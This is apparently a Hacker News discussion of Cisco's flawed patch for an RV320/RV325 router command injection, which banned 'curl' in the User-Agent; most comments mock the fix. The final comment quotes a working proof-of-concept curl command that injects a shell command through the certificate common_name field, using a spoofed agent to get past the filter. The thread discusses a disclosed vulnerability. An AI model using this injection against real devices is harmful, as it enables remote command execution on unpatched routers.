21 ms·
Cisco Fixes RV320/RV325 Vulnerability by Banning “curl” in User-Agent
- arcticbull 8y agoI... do they know about -A? Someone should tell them.
- StavrosK 8y agoI don't see what the fuss is about. This is an effective mitigation, given that software can't just arbitrarily lie about its user agent.
- abraae 8y agoEh? Software can do exactly that.
- arcticbull 8y agoPretty sure that was sarcasm haha
- deleted 8y ago[deleted]
- StavrosK 8y agoHow? Do you think developers would be so crazy as to add some sort of "--user-agent" option to software like curl that would cause arbitrary strings to be presented as the user agent? Why would somebody write software to do this, just go on the internet and tell lies?
- faitswulff 8y agoI thought all this security nonsense ended in the 90s when they introduced the IS-MALICIOUS-REQUEST header. It must be, because I haven't seen any web traffic declaring itself malicious since then.
- ezoe 8y agoI believe most devices implemented now 11 years old RFC 3514. So evil packets and non-evil packets can be easily distinguished.
- TheCraiggers 8y agoWhile that's probably technically feasible, that sounds like something only a terrorist would do anyway. All the more reason to ban the entire program, I say!
- deleted 8y ago[deleted]
- maxaf 8y agoYour downvoters are terrible at detecting satire.
- anyfoo 8y agoEven without --user-agent, you can still pipe 'echo -e "GET ...\rnHost: ... "' through nc, or even telnet. Therefore, we obviously need to patch echo (and all echo shell builtins) to refuse to output strings containing "GET", "POST", "HTTP", or "Host:".
- colordrops 8y agoOoh boy I'm imagining some bureaucratic version of an operating system that uses this sort of security up and down the entire stack like some rube Goldbergian contraption to whack a mole a particular vulnerability. Like an operating system designed by doctor Seuss.
- zrm 8y ago> Therefore, we obviously need to patch echo (and all echo shell builtins) to refuse to output strings containing "GET", "POST", "HTTP", or "Host:". Unfortunately it is also possible to do this using file redirection or to write a new program that will make a TCP connection and send arbitrary data through it, making it necessary to do the same for all editors, compilers and interpreters. That sounds like a lot of work though (there are many such programs), so maybe we ought to just patch the kernel to prohibit any of those strings from being written to a file descriptor. There can't be that many false positives.
- ezoe 8y agoWhy stop there? The user can easily modify the kernel to disable such prevention measures for malicious usage. We must have a regulation to require a hardware level detection and prevention features of curl which all hardware vendors must follow.
- asynch8 8y agooh god stop some politician might see this and take you for being srs
- craftinator 8y agoBut users have fingers, which can be used to disable or subvert said "features". Thus, those fingers are just gonna have to go. They're a security risk, and security risks are against the regulations.
- sbmassey 8y agoOnly software developers with no honour would ever do that.
- teraflop 8y agoI guess the biggest problem is that the mitigation isn't future-proof. Someday, there might be other command-line tools besides cURL that can be used for this kind of attack. A better fix would be to just drop all incoming IPv4 packets that have the "evil" bit set. (https://www.ietf.org/rfc/rfc3514.txt https://www.ietf.org/rfc/rfc3514.txt) Extending this protection to IPv6 is left as an exercise for the reader.
- StavrosK 8y agoAh, but what about packets that aren't evil, just gullible and manipulated by some third party?
- dvhh 8y agoThen add a "tainted by evil" flag to the ipv7 spec, or better, just add a "pure" flag to future ip spec.
- StavrosK 8y agoI think I'd almost prefer an "alignment" flag, so we don't mischaracterize all the Chaotic Neutral packets.
- wincy 8y agoWell if you’d read the RFC it’s obvious it’s your routers responsibility to flag those bits as evil. And if you’re using heuristic intrusion detection systems you need to do flag each bit as evil 50% of the time. It’s good we have such amazing protections in place.
- lxe 8y agoExactly. Hacking your client to use another user-agent or another IP address is illegal under CFAA. See Craigslist Inc. v. 3Taps Inc. etc...
- gonesilent 8y agoSo when I check desktop site in chrome I'm hacking?
- chii 8y agoOf course! So is right clicking and selecting inspect element to modify the page!
- chronogram 8y agoI would call it hacking.. you sometimes run into those websites with 50 different opacity bits for all their web app things, and you don’t want to deal with all that rubbish so you set a “opacity: 1 !important” and the whole website looks off but it’s finally useable. I’d call that a hack. Or also when you run into those websites designed on a $2000 screen that thinks it’s tres moderne to use 808080 text, so you “hack” it into readable text. I think those are all happy little hacks :-)
- Tepix 8y agoThat's why super secure websites block right-click events on their webpage. Makes them unhackable!
- stevefan1999 8y agoThis is quite funny
- StavrosK 8y agoI am not laughing one bit let me tell you. Honesty in user agents is one of the last few defenses we have against hackers running rampant on the internet and turning it into some lawless wasteland where people don't even answer truthfully about their A/S/L.
- jniedrauer 8y agoI think you should have added a /s tag... some people don't get jokes unless you hit them over the head with it.
- StavrosK 8y agoI will never stoop so low as to telegraph my own joke.
- wyldfire 8y agoThen you must encounter Poe's Law frequently....?
- StavrosK 8y agoAll the time. After having seen the kinds of things some people will say in earnest, I will never begrudge someone missing my sarcasm.
- thayne 8y agoIn textualform, sarcasm and ignorance look the same. otoh, it can sometime be quite funny to see responses from people that take it seriously...
- dmix 8y agoI've never posted sarcasm online without at lease one person (that guy) who takes it seriously and decides to reply. But I think it's worth it because the people who get it will get it. If a small group doesn't then who cares (if everyone doesn't then you did a bad job constructing a joke).
- labster 8y agoI couldn't agree more. The joke construction was a bit weak though, when you miss a good part of the audience. Add something like, "I mean, could you imagine the chaos it would cause if IE told websites it was really Mozilla?" and you demonstrate mastery of the subject matter, which should be enough to let other experts know you were facetious rather than ignorant. Unless you have timing issues... or need the comedian's plausible deniability.
- Macross8299 8y agoExactly, once they roll out the patch with a boolean OR in the conditional as '$http_user_agent ~* "wget"', it'll pretty much be hack proof!
- frjalex 8y agolibcurl is open source, I would imagine it'd not be difficult to make it "lie."
- anyfoo 8y agoSomeone who also did not get the joke is going to read your comment, and suggest that libcurl being closed source somehow fixes the problem.
- da_chicken 8y ago(Hint: the curl command already has a --user-agent parameter which allows the user to set the user agent string.)
- dvhh 8y agoI have to fix my sarcasm detection AI again because of this comment
- StavrosK 8y agoYou're welcome!
- ReptileMan 8y agoAnd it is also very good that regexes are simple, unambiguous, easy to debug and their engines are heavily scrutinized that no code execution/undefined behavior is possible.
- Pxtl 8y agoWell, they can, but first they have to flip the RFC3514 "Evil" bit.
- deleted 8y ago[deleted]
- fixermark 8y agoIt does seem so obviously simple to sidestep that it makes me wonder if they pushed it because they had an active attack they believed it would mitigate. Were they concerned that the attack was already baked into some automated script in the wild and this could perhaps at least trip up the script long enough for them to engineer a real fix? Scripted attacks can of course be modified too, but it still takes more than zero human effort to do it.
- Anarch157a 8y agoCurl can, easily. Curl is not just a client to get a file and pipe it to other programs, it's a diagnostic tool, and it has all sorts of parameters to help it simmulate all kinds of interaction with a webserver, including the -A parameter to change the user-agent, this is why this 'fix' is so stupid.
- delfinom 8y agocurl -A "iswearimnotcurl" <exploit>
- deleted 8y ago[deleted]
- PinkMilkshake 8y agoThey might be able to fix it by making the only valid user agent “not-curl-honest”.
- webninja 8y agoActually you can use -A to change the user agent in Curl itself. For example: curl -A "YourNewUserAgentString” http://url.com Furthermore, there are free plugins or add-ons for both Chrome and Firefox that let you change the user agent and say you’re using IE, a mobile browser, a google bot, or anything you want the user agent string to say. Most programmers should be able to write a small script using Python’s urllib or urllib2 to do a basic PUT or GET request with any User Agent. Heck, just type “change user agent python urllib” into google, click on the first stack overflow link, and copy/paste the answer. You can use Go, ruby, java, nodeJS, or PHP instead as well. Edit: Maybe your comment was sarcasm :)
- StavrosK 8y ago> Edit: Maybe your comment was sarcasm :) I still appreciate you putting in the effort to explain. Have an upvote!
- ikeboy 8y agoSource says they also did some input sanitizing along with blocking curl, and they had to make a new PoC to get around that. If I'm reading that right then this isn't really an issue, nothing wrong with defense in depth. Edit: >The update adds several filters to handle single quotes in user input. However, these filters can be evaded by specially crafted inputs. By providing the following string for the certificate's common name, a "ping" command can be injected: Title is misleading, implying the only patch was blacklisting curl.
- StavrosK 8y agoI agree, it's just good sense. It's even encapsulated in the bit of folk wisdom about throwing the baby out with the bathwater.
- Dylan16807 8y agoThe equivalent of a "pls dont hack" sign is not defense in depth. Good to know they at least half fixed the problem, I guess. But that's not enough, and they should be capable of testing this.
- function_seven 8y agoI would expect them to check for any RFC3514 bits as well. Defense in Depth.
- Jach 8y agoThe real defense is the attacker needs to access and authenticate with the router's web interface. A more honest patch would be to legitimize the bug as a new feature since it must be too amateur-hour over there to actually address any webshit security issues. "Dear Admin, here's a textarea to run arbitrary commands as root, don't hurt yourself!"
- user5994461 8y agoCan anything without a "please don't hack" sign considered defense in depth? Probably not, hence an appropriate first patch.
- danso 8y agoOf all the security post-mortems I’ve ever wanted to read, it’s sad I’ll probably never get to read this one and its tale of how a team of well-paid comfortable engineers got together and decided this patch was a good idea.
- gruez 8y ago>how a team of well-paid comfortable engineers got together and decided this patch was a good idea Test-driven development
- necovek 8y agoOnly if you are really bad at it. Really, really bad. It's completely unrelated to any development methodology, this is someone unaware of basic HTTP protocol semantics. So just bad development, period.
- Twirrim 8y ago> how a team of well-paid comfortable engineers got together and decided this patch was a good idea. That's assuming that the well-paid and comfortable engineers decided on and implemented the patch.
- icedchai 8y agoIt looks like this is a low end Cisco device, released over 5 years ago. Patches are probably handled by underpaid interns, not well-paid engineers.
- deleted 8y ago[deleted]
- trhway 8y agoi'll raise you a case where a team of very well paid senior engineers/architects and PMs dismissed a remote execution vulnerability down to a very low "some next release" priority on the grounds that "notepad.exe doesn't seem to do any damage" - as you may have guessed the vulnerability PoC used notepad.exe . After seeing that with my own eyes, this Cisco curl is just "meh" for me :)
- MiddleEndian 8y agoUser agents shouldn't exist any more. They serve only to help unsuspecting users be fingerprinted.
- baggy_trough 8y agoRubbish. They are incredibly useful for debugging.
- justinjlynn 8y agoThere are better solutions available than hanging functionality on unreliable vestigial bits and pieces that shouldn't be there anyway which, because others abuse the functionality, you can't trust to be correct for debugging purposes.
- baggy_trough 8y agoThat might be true, although you don't list the solutions, but it doesn't refute my point in any case.
- adrr 8y ago99% of the traffic has the correct user-agent which is useful in tracking down issues that are browser specific. The other 1% will just get ignored as noise. And it's not like we can't tell what type of browser they are using with browser specific objects that we can pull from javascript. We just can't infer the version of the browser which is critical for debugging issues.
- kevin_thibedeau 8y agoI use a randomized user agent and every once in a while get rejected by a site that has decided my browser can't be supported. Usually when I'm on some Safari version. I doubt much effort is being done to identify fake user agents since there are better fruit to pick in the fingerprinting game.
- 8y ago
- Cyph0n 8y agoOuch. Thankfully, I get to work on a more interesting router...
- Camillo 8y agoI think this is called "Test Driven Development". /s
- jasonhansel 8y agoActually, this sort of superficial fix can be a result of (overzealous) TDD.
- hnick 8y agoToo busy chasing the green.
- earenndil 8y agoTests must not be robust enough, then.
- sheeshkebab 8y agoyes, they need to add a test for wget (and a comparable fix) - that will teach them how to do tdd right.
- armada651 8y agoThey'll just add another user agent check.
- winrid 8y agoThis would be more of an integration test right?
- jrochkind1 8y ago"That's not how this works. That's not how any of this works."
- bifrost 8y agoI posted something related to this a couple weeks ago. Chase banned my web client because its not Windows/OSX. It works fine if I change my user agent... FWIW the RV series is the ex-linksys stuff so it should all be thrown in the trash anyways.
- 0x0000000 8y agoI have one of these routers :\ So far I'm unable to get the PoCs to work but that doesn't make me confident. I'm curious how pen testers reverse the .bin firmware download into source code, anyone have any insight there?
- namibj 8y agoIda64/Binary analysis tooling, I presume.
- MertsA 8y agoThat's not source code, that's just a config file embedded into the firmware. For most firmware, it's a large binary file that often has different sections containing stuff like an OS kernel at one spot, a compressed archive somewhere else, etc. For the Cisco firmware in question in the middle of the firmware is a compressed CPIO archive (think of it like a zip file) that contains the root file system. The router is actually a small linux computer, inside that archive they have a config file for nginx (a web server) that tells nginx to return an error if it sees the user agent string for curl. There's no programming required here, just a trivial configuration change that masks the actual issue.
- rvr_ 8y agoDon't blame the manager, the PO, the CEO. This is ABSURD engineering incompetence. The fellow that did that _fix_ probably had no idea how to properly solve the issue.
- tonyedgecombe 8y agoIf it is then it's management's responsibility for allowing that incompetence to exist. These sort of issues all come from the culture which is driven from the top.
- empath75 8y agoSo having an absurdly incompetent engineer implementing this fix isn't a management problem?
- smt88 8y agoManagers, POs, and CEOs are responsible for preventing this by: - hiring people who'd know not to do it - creating processes for more than one security expert to review security patches - requiring the testing of patches against real-world workarounds - allotting the time and budget necessary for all of the above
- sschueller 8y agoMeanwhile the US goes around telling other countries not to use Huawei because they can't guarantee security. [1] [1] https://www.forbes.com/sites/zakdoffman/2019/02/19/huawei-founder-the-u-s-does-not-represent-the-world-they-will-not-crush-us/#fee844a2433d https://www.forbes.com/sites/zakdoffman/2019/02/19/huawei-fo...
- gvand 8y agoI doubt they are referring to their security bugs.
- yjftsjthsd-h 8y agoThere can be more than one company that's a security risk.
- craftoman 8y agoThat's hilariously reasonable if someone didn't read the news latetly and suddenly got a 403 while executing this payload using curl would probably quit and be like "meh it got patched". Look on the bright side guys.
- derpherpsson 8y agoCisco is crumbling under its own weight. This is a symptom of the rot in their management, and probably also a sign that they have hired too many incompetents. It probably also is a sign of the current age. After the recovery from the IT-bubble programming got really hot. Thus: Too many of the new programmers wants to be programmers because it pays well - not because they love their craft. So therefore we have a bunch of well-paid but uninterested people seeking jobs at prestigious companies. Culture matters. I want my socially maladapt terminal junkies back plz.
- chii 8y ago> I want my socially maladept neckbeards and terminal junkies back plz. the MBA types don't like these hacker types - personality clash and whatnots. But the MBA types control the company from above, and the hacker types don't like to do management work. The result is obvious.
- derpherpsson 8y agoSome time ago I went through the list of all the major router manufacturers and rated them on 1) security, and 2) long term usability, and 3) culture. My conclusion was that I would buy my infrastructure from Allied Telesis. It's pretty much a Japanese version of Cisco, but it's still healthy. Ubiquity was number 2. I refrain from buying from them only because of their glossy UI. Mikrotik was on that list. Until I saw how horrible their winbox protocol was. And their implementation of SMB.. I must assume there are still plenty of unknown RCEs there.
- ryanlol 8y agohttps://threatpost.com/hardware-vendor-offers-backdoor-every-product-052611/75275/3/ https://threatpost.com/hardware-vendor-offers-backdoor-every... At least Allied Telesis documents their backdoors :)
- derpherpsson 8y agoLOL I guess there is nothing good.. what is wrong with people :(
- pyb 8y agoDid they hire someone off freelancer.com to fix this ? (in reference to : https://news.ycombinator.com/item?id=19318498#19329754 https://news.ycombinator.com/item?id=19318498#19329754)
- Tepix 8y agoThis "fix" seriously hurts Cisco's credibility. How can you trust their products? Perhaps they are thinking that noone gives a damn anyway after no less than five backdoors² were found in their products in 2018 alone? Just incredible. ² https://www.tomshardware.com/news/cisco-backdoor-hardcoded-accounts-software,37480.html https://www.tomshardware.com/news/cisco-backdoor-hardcoded-a...
- sparkling 8y agoCisco is in the business of selling big, black, expensive boxes that have a lot of security badges and fancy icons. People who buy such boxes don't care if they actually work, they want a big box so that they can claim they "invested in security".
- pwg 8y agoActually, they want the Cisco box because it has those 'badges' and that then allows them to check off all the check-boxes on the semi-annual security compliance report paperwork they have to file with some other department. But you are right, they don't care if the box is secure, they just care that they have a CYA that allows them to "check off their own boxes" on their reports.
- user5994461 8y agoWhat would you buy instead of Cisco? HP and Dell are the same thing. From experience a decade ago, the HP usually did not have the enterprise features they advertised. The other minor brands are very hard to procure if you're not in the US or a primary English speaking country.
- Drdrdrq 8y agoJuniper? Extreme? The list is not very long, but doesn't contain just Cisco.
- user5994461 8y agoLast I checked, long ago, they were impossible to procure in France. Pretty sure Extreme is still non-existent in Europe as of today. For all the flaws of Cisco, well the only flaw is the price, they can deliver in any language anywhere in the world.
- Corrado 8y agoHere is the original vulnerability report: https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-005/-cisco-rv320-command-injection https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-0...
- JdeBP 8y ago... which has -A kurl in the proof of concept. I also note the timeline * 2019-01-22 Firmware 1.4.2.20 released by vendor ... * 2019-02-07 Incomplete mitigation of vulnerability identified ... * 2019-03-25 Vendor requests postponed disclosure So this is apparently a bad fix that Cisco has known about since February, and asked for an extension in order to fix again.
- fafl 8y agocurl -A "UserAgentString" http://example.com http://example.com
- melbourne_mat 8y agoWithout actually knowing the truth, my guess is outsourcing: Cisco thought it would be a great idea to save some cash on technical staff so they now do a lot of the grunt work through company X in country Y.
- forgotAgain 8y agoI wish it was Curly. We could then make jokes with Moe and Larry.
- icedchai 8y agoOkay, so the fix is bad. Now, you have to wonder how this "fix" made it through code review, QA, release... You can blame the engineer. Perhaps they were rushed, inexperienced, or both, but this is a failure on all levels.
- smt88 8y agoMany people would've seen and signed off on this fix, not just one engineer.
- icedchai 8y agoYes, exactly my point. How can this happen? Maybe nobody cares.
- coldcode 8y agoHow do you know it wasn't fixed by the offshore maintenance team with an offshore manager controlled by a VP wanting a quick promotion for doing things fast? That would be where I work the likely scenario.
- davesque 8y agoI feel like this tweet sums up the situation: https://twitter.com/dogetard/status/1111110061768822784?s=20 https://twitter.com/dogetard/status/1111110061768822784?s=20
- C1sc0cat 8y agoThey do know that you can spoof the user agent I regularly do this to crawl sites.
- mikevp 8y agoIt's not like anyone could ever change their user agent in their curl config. Oh, wait... cat ~/.curlrc user-agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0"
- runeks 8y agoThe updated PoC command from the exploit page[1]: $ curl -s -k -A kurl -X POST -b "$COOKIE" \ --data "page=self_generator.htm&totalRules=1&OpenVPNRules=30"\ "&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A"\ "&organization=A&organization_unit=A&email=ab%40example.com"\ "&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&"\ "SelectSubject_s=1" \ --data-urlencode "common_name='a\$(ping -c 4 192.168.1.2)'b" \ "https://192.168.1.1/certificate_handle2.htm?type=4" Quick, Cisco! Also add “kurl” to the list of banned user agents. [1] https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-005/-cisco-rv320-command-injection https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-0...